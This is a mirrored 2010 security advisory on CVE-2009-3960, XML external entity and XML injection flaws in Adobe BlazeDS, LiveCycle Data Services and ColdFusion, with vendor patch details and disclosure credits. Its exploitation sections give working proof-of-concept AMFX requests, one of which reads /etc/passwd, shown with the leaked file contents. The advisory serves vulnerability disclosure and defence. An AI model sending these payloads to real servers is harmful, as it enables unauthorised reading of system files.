扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 |
(, ) (, . <code>.' ) ('.', ). , ('. ( ) ( (_,) .</code>), ) _ _, /_____// _\________ _____ \____\==/ /_\\ _/ ___\/_ \ / \ / \/ |\\\__(<_> )Y Y\ /______/\___|__/ \___>____/|__|_|/ \/ \/.-.\/ \/:wq (x.0) '=.|w|.=' _='<code>"</code>`=. presents.. Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities CVE: CVE-2009-3960 Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf +-----------+ |Description| +-----------+ Security-Assessment.com discovered that multiple Adobe products with different Data Services versions are vulnerable to XML External Entity (XXE) and XML injection attacks. XML external Entities injection allows a wide range of XML based attacks, including local file disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to the RFC2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt +--------------+ |Product Review| +--------------+ Adobe Data Services components provide Flex/RIA applications with data messaging, remoting and management capabilities. The discovered vulnerabilities affect the HTTPChannel servlet classes which are respectively “mx.messaging.channels.HTTPChannel” and “mx.messaging.channels.SecureHTTPChannel”. These classes are part of the Data Services Messaging classes and can be found in the flex-messaging-common.jar Java archive. The HTTPChannel transports data in the AMFX format, which is the text-based XML representation of AMF. The HTTPChannel endpoints are defined in the services-config.xml file, located within the Flex/WEB-INF folder of the application. By default, the HTTPChannel classes are mapped to the following endpoints: 1. http://{server.name}:{server.port}/{context.root}/messagebroker/http 2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure Note that the HTTPChannel may be mapped to different endpoints. This depends on the deployed application and the framework in use (e.g. BlazeDS, Adobe LiveCycle Data Services, etc.). +--------------------------------------------+ |Exploitation - XML External Entity Injection| +--------------------------------------------+ XML entities can be declared and included within AMFX requests passed to the HTTPChannel. The XML parser parses the payload and successfully processes injected entities. The following table shows an example of XML external entity injection which leads to local file disclosure. The AMFX request is sent via the HTTPChannel endpoint in BlazeDS. XML External Entity Injection – Local File Disclosure PoC – BlazeDS – Request POST /samples/messagebroker/http HTTP/1.1 Content-type: application/x-amf <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]> <amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"> <body> <object type="flex.messaging.messages.CommandMessage"> <traits> <string>body</string><string>clientId</string><string>correlationId</string> <string>destination</string><string>headers</string><string>messageId</string> <string>operation</string><string>timestamp</string><string>timeToLive</string> </traits><object><traits /> </object> <null /><string /><string /> <object> <traits> <string>DSId</string><string>DSMessagingVersion</string> </traits> <string>nil</string><int>1</int> </object> <string>&x3;</string> <int>5</int><int>0</int><int>0</int> </object> </body> </amfx> XML External Entity Injection – Local File Inclusion PoC – BlazeDS – Response <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true"> <string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header> <body targetURI="/onResult" responseURI=""> <object type="flex.messaging.messages.AcknowledgeMessage"> <traits><string>timestamp</string><string>headers</string> <string>body</string><string>correlationId</string> <string>messageId</string><string>timeToLive</string> <string>clientId</string><string>destination</string> </traits><double>1.257387140632E12</double><object> <traits><string>DSMessagingVersion</string> <string>DSId</string></traits><double>1.0</double> <string>BDE929FE-270D-3B56-1061-616E8B938429</string> </object><null/><string>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh [...] The above injection was successfully tested on multiple Adobe products, as shown below: 1. Product: Adobe BlazeDS 3.2.0.39 Linux Ubuntu 9.04 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 2. Adobe LiveCycle Data Services ES2 3.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 3. ColdFusion 9.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/flex2gateway/http {server.name}:{server.port}/ {context.root}/flex2gateway/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 4. Adobe LiveCycle ES2 Windows XP SP2 / IBM Websphere 7.0 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS The vendor has released several patches for this vulnerability. See the Solution section of this document for more information. +----------------------------+ |Exploitation - XML Injection| +----------------------------+ The XML parser lacks of proper input and output validation controls. Security-Assessment.com managed to inject arbitrary XML content which was returned in the XML response. The following table shows an XML injection in the BlazeDS HTTPChannel. The injected payload becomes part of the response. In this case, injection is possible via the “responseURI” attribute. XMLInjection – BlazeDS - Request POST /samples/messagebroker/http HTTP/1.1 Content-type: application/x-amf <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/> </body></amfx> XMLInjection – BlazeDS - Response <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx> The above injection was successfully tested on multiple Adobe products, as shown below: 1. Product: Adobe BlazeDS 3.2.0.39 Linux Ubuntu 9.04 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 2. Adobe LiveCycle Data Services ES2 3.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 3. ColdFusion 9.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/flex2gateway/http {server.name}:{server.port}/ {context.root}/flex2gateway/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 4. Adobe LiveCycle ES2 Windows XP SP2 / IBM Websphere 7.0 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS The vendor has released several patches for this vulnerability. See the Solution section of this document for more information. +--------+ |Solution| +--------+ Security-Assessment.com follows responsible disclosure and promptly contacted the vendor after discovering the issues. The vendor was contacted on the 6th November 2009 and a reply was received on the same day. The vendor released security patches on the 11th February 2010. The security patches can be downloaded at the following website: http://www.adobe.com/support/security/bulletins/apsb10-05.html +------+ |Credit| +------+ Discovered and advised to Adobe in November 2009 by Roberto Suggi Liverani of Security- Assessment.com. Personal Page: http://malerisch.net/ For full details regarding this vulnerability download the PDF from our website: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf +---------+ |Greetings| +---------+ Bug found at Hack in The Sun 2009, Waiheke Island. +-----------------------------+ |About Security-Assessment.com| +-----------------------------+ Security-Assessment.com is a New Zealand based world leader in web application testing, network security and penetration testing. Security-Assessment.com services organisations across New Zealand, Australia, Asia Pacific, the United States and the United Kingdom. Roberto Suggi Liverani |
体验盒子
